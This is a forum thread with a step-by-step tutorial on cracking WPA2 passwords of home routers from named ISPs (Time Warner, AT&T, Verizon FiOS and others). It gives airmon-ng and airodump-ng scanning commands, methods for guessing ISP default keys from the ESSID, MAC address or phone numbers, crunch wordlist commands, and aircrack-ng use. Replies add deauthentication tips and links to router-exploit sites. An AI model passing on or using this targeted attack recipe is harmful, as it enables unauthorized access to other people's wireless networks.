Crack WPA2: Know Your Target

Discussion in 'Dictionary, Password & Wordlists' started by ImJoJo, 14 Nov 2012.

  1. ImJoJo

    ImJoJo The One & Only
    VIP

    Joined:
    25 Jun 2012
    Messages:
    246
    Likes Received:
    107
    Trophy Points:
    191
    UPDATED 1/7/2013
    I created a simple tutorial on a different approach in cracking WPA2 on a specific ISPs like: Time Warner Cable (RoadRunner), Charter Cable, COX and Comcast.

    It may vary by where you live but, it is targeted at all cable companies that also offer telephone and internet services. You will have to do a bit of homework to make things easier for you, less time consuming and have a higher success rate.

    :? This is for educational purposes only! :?

    First we have to make sure we have a sniffing tool such as Airodump-ng or inSSIDer as we will need to know the SSID, ESSID and the channel of the AP we want to attack.

    Once you have your tool ready to go what you want to do is have it scan. In airodump-ng you type the following commands to get it in monitor mode:
    Code:
    Select All
    sudo airmon-ng start wlanX
    The X above is a variable. In terminal, your terminal command should look like this (as an example):
    airmon-ng start wlan1
    Start scanning the air for APs:
    Code:
    Select All
    airodump-ng mon0
    :? Helpful Tip: To stop scanning push Ctrl + C :?

    With inSSIDer, at the top right simply choose the adapter and click on START. The cool thing about inSSIDer is that it gives you the vendor information (through the MAC address) which is one of the things we will be looking for to make the attack more effective and precise while making it less time consuming.

    [​IMG]

    Notice all the APs in the image above? How can we tell which is which? Simple!

    I have sorted them out by Vendor. In this case we will try to crack one of the AP from the ISP TimeWarner (RoadRunner) (with owner’s permission I did this). In 90% of the time TimeWarner (RoadRunner) tend to operate their APs through channel 1 but, counting all the APs in channel one we can see a total of 8.

    They also use WPA2 encryption, so now we narrow things down to 4. To be more precise we will narrow things down by the vendor, in this case Gemtek Technology Co. Ltd. which is what TimeWarner (RoadRunner) uses.

    Another thing we can look at is that TimeWarner (RoadRunner) will use as an ESSID the customer’s First or Last name, making it still easier to spot. So now we narrow it down to 2 APs. Now we come to a conclusion that those 2 APs from operating in CHANNEL 1, under WPA2, Gemtek Tech. Co. Ltd are from TimeWarner (RoadRunner).

    NOTE: Notice one of the 2 AP’s has the Last name of the person while the other does not?

    What Does that mean? One major weakness in TimeWarner (RoadRunner) is the APs has been resetted at some point for whatever reason making it extremely vulnerable to a dictionary attack. Why? Unfortunately when you reset the modem by default the model of the modem is used as the ESSID.

    Yes, even though it shows Gemtek Tech. Co.Ltd. as vendor the actual gateway vendor is Motorola. As to why is this, I haven’t looked into that but, don’t get confused. I believe Gemtek is for LAN and Motorola is for WAN.

    Anyways, when you see an AP with Gemtek Tech. Co.Ltd. as vendor but with SBGxxxx as the ESSID know this, they are giving you part of the passphrase. How much to be exact? Well, every character is part of the passphrase. All you need to do is crack the remaing four. In this case the AP named SBG65800C is letting us know that SBG6580 is the model and SBG6580 is also half of the passphrase (KEY).

    sbgtest3.png

    sbgtest4.png

    The other half is the second half of the WAN MAC Address..as 0C being the last two…So what to do from here? Simple! Use Crunch and create a custom wordlist starting with SBG6580 and ends with
    0C.
    Code:
    Select All
    ./crunch 13 13 0123456789ABCDEF -t SBG6580@@@@0C -o SBG.txt
    Notice the wordlist I created was not even 1MB.
    So after I created the wordlist I simply ran Aircrack-ng and attempted to crack the Handshake and the results were as expected. Took Aircrack-ng only 20 seconds to find the Key. This applies only to Motorola.

    If you use airodump-ng you can go here http://www.macvendorlookup.com/ and simply type the first 6 characters and it will tell you which vendor it is. I would also like to point out that not all APs with TimeWarner (RoadRunner) will have Gemtek as vendor due to a feature that the Motorola surfboard has which is MAC Spoofing. But don’t let that fool you.

    [​IMG]

    Moving on to other ISP’s well it just requires you doing a bit a researching on your local ISP’s. Some might have Charter, others might have Comcast or COX. Whichever it is make sure to pay their support webpage a visit to see which Vendor’s they carry. Some ISP’s will let you know who they are like on the image above. ATT576…can you guess? Ding Ding Ding! Yes you got it right! It’s AT&T…TimeWarner does not carry 2WIRExxx and only being 2 ISP’s that cover that area. From the image above we now know that the 2WIRExxx are also from AT&T..Also cause they operate under channels 6 and 11. And TimeWarner(RoadRunner) only channel 1.

    Ok so once you know how to tell them apart one question arises, how will you attack it? Of coarse this tutorial is only for the Dictionary Attack but, you have to know which Dictionary/Wordlist you are going to use. Because it pointless to use a 50GB wordlist if the passphrase is only numbers. Cable companies that offer telephone service and internet will typically use the phone number as the KEY.

    So all you have to do is create a wordlist using the area code in which you live and within an hour BAMM! You have your KEY. To create a custom wordlist such as phone number and area code you have to use a tool such as Crunch which already comes in BackTrack 5R3. Here is the command to create a wordlist such as the one we will need to crack an AP that uses the phone number as the passphrase (key).

    Code:
    Select All
    /pentest/passwords/crunch/./crunch 10 10 1234567890 –t 878@@@@@@@ -o wordlist.txt
    Where in –t 878 = you are code..change 878 to whatever the target AP area code is.. and where –o wordlist.txt is the name of your wordlist. So you can change it to whatever you want like –o arealist.txt or whatever you want.

    An alternative to saving a wordlist which a wordlist using a phone number is not big at all not even 300mb would be this amazing tutorial frommrmanuelmtzma member at xiaopan.co/forums. He posted that amazing tutorial using Aircrack-ng and Crunch without having to save the dictionary/wordlist to your flashdrive or HDD. So it’s pretty much in BruteForce method..pretty cool huh!

    http://xiaopan.co/forums/threads/crunch-aircrack-ng-to-avoid-wordlists.809 Thanks mrmanuelmtzm!

    [​IMG]

    Above you can see that a Handshake has been acquired and the passphrase has been retreived using a dictionary that I custom made for this specific AP. As you can see it only took me 20 mins. and 40 seconds. Reaver could have taken longer. But know your target can save you lots of time.

    For ATTxxx AP’s many have thought that the phone number was used but, that is not true. It’s a 10 digit number placed on a sticker on the modem. ..so to attack this AP I suggest using the Aircrack-ng Crunch method above due to the extremely large file that will be created (over 100GB’s)

    Attacking the well know 2WIRExxx AP’s is almost the same as an ATT AP…same method is suggested to attack this Access Point as with the ATTxxx…but you can use this link provided here to help out…it is a pretty cool online tool for many types of AP’s such as 2WIRExxx, 3Com, Arris, Asmax, Belkin, Cisco, Comtrend, DD-Wrt, DLink, EasyBox, Fibrehome, Huawei, MiFi, Motorola, Netgear, Pirelli, RuggedCom, Sagem, Seagate, Siemens, Thomson, TP-Link, TRENDnet, Ubiquiti UTStarcom, Xavi, ZyXEL: http://routerpwn.com/

    An alternative for that you can check this out: http://xiaopan.co/forums/threads/android-thomson-key-solver.528 Thanks Mr. Penguin!

    Moving on to a different type of AP…this one we could say is the easiest to crack. Though it not the dictionary attack that will be used but, I thought it be cool to write about it in this tutorial. Verizon FiOS..most of nearly 95% of their AP’s are WEP and are know by their easy to tell five character ESSID

    [​IMG]


    And notice the vendor Actiontec Electronics Inc. As you may already know WEP can be cracked in a matter of seconds..But there are two alternatives to crack these AP’s. There are many online tools like this one: http://aruljohn.com/fios/

    or you can download an app for your Android phone: http://xiaopan.co/forums/threads/vz-wifi-connect.560/

    You can also check out this FREE online WPA2 cracker…they also offer a paid service for those interested: http://gpuhash.com/?menu=en-tasks-add

    So always do your homework, find out a bit about the target AP..don’t just shoot blindfolded. Know what you’re shooting at. (figure of speech) But if you have the option of using Reaver 1.4…go ahead and use it though at times Dictionary Attack can be faster if you know more about your target like the example shown above.

    Hope this tutorial may help in cracking WPA2 for those certain AP you been looking to crack.
     
    • Like Like x 3
  2. estimacamry

    estimacamry Tracker
    VIP

    Joined:
    3 Aug 2012
    Messages:
    552
    Likes Received:
    131
    Trophy Points:
    91
    ImJoJo
    Nice tutorial. I run BT5 on live usb so whatever been done will not be save. If I save the cap file to my external hard drive, can I run it against my wordlists when I'm on BT5 again at another time?
     
  3. ImJoJo

    ImJoJo The One & Only
    VIP

    Joined:
    25 Jun 2012
    Messages:
    246
    Likes Received:
    107
    Trophy Points:
    191
    ThankYou estimacamry! Many friends of mine have had lots of success as well by applying these rules. As to your question, Yes, you can always save it to an external drive to try to crack it anytime you want. There will be an update to this tutorial very soon. Keep posted! :D
     
  4. Shuren Flames

    Shuren Flames Active Member

    Joined:
    29 Jan 2013
    Messages:
    9
    Likes Received:
    1
    Trophy Points:
    33
  5. ImJoJo

    ImJoJo The One & Only
    VIP

    Joined:
    25 Jun 2012
    Messages:
    246
    Likes Received:
    107
    Trophy Points:
    191
    You're welcome! ;)
     
  6. kumakita

    kumakita Member

    Joined:
    2 Feb 2013
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    6
    Thank. For answer
     
  7. Crackerz Wave

    Crackerz Wave The Dictator
    Staff Member Moderator VIP

    Joined:
    20 May 2012
    Messages:
    650
    Likes Received:
    128
    Trophy Points:
    141
    My new isp in malaysia,,they provide 8pin digit(all number) ..so i create the dictionary from 0x8-9x8..and u know what? it work

    the problem for me is getting the handshake,,and faster dic attack...as reaver only trying same pin
     
  8. ImJoJo

    ImJoJo The One & Only
    VIP

    Joined:
    25 Jun 2012
    Messages:
    246
    Likes Received:
    107
    Trophy Points:
    191
    let me see if I understood..the new ISP provides an 8 digit pin or KEY?..all WPS is 8 digits..if its the KEY that is also 8 digits, you should try pyrit if you get the handshake...way faster than aircrack-ng..something 8 characters on a dictionary attack should take an average time of about 30-45 mins on decent hardware.
     
  9. Crackerz Wave

    Crackerz Wave The Dictator
    Staff Member Moderator VIP

    Joined:
    20 May 2012
    Messages:
    650
    Likes Received:
    128
    Trophy Points:
    141
    The isp set the default key is 8digit......the problem for me is to get the handshake...if people use the network..than i can get handshake
     
  10. ImJoJo

    ImJoJo The One & Only
    VIP

    Joined:
    25 Jun 2012
    Messages:
    246
    Likes Received:
    107
    Trophy Points:
    191
    Oh thats not good...sometimes clients wont show or they will take a while to appear. Try sending 5 deauthenication packets to the AP and hopefully they'll show. It sometimes works for me..:)

    Sent from my LG-MS770 using Tapatalk 2
     
  11. -xyz

    -xyz Member

    Joined:
    6 May 2014
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    6
    Wow nice thread........could you give me any tips on creating a dic for Arris group, inc.
     
Loading...
  • About Us

    We are a community mixed with professionals and beginners with an interest in wireless security, auditing and pentesting. Feel free to check out and upload resources.


    You can also find us on: Twitter and Facebook

  • Donate to Us

    Did you find our forums useful? Feel free to donate Bitcoin to us using the form below. Those who donate the equivlent of $10 USD or more will be upgraded to VIP membership. Don't have Bitcoin? Use your credit card to GO VIP here. Don't want to fork out some coin? There are other ways to GO VIP. Bitcoin: 1LMTGSoTyJWXuy2mQkHfgMzD7ez74x1Z8K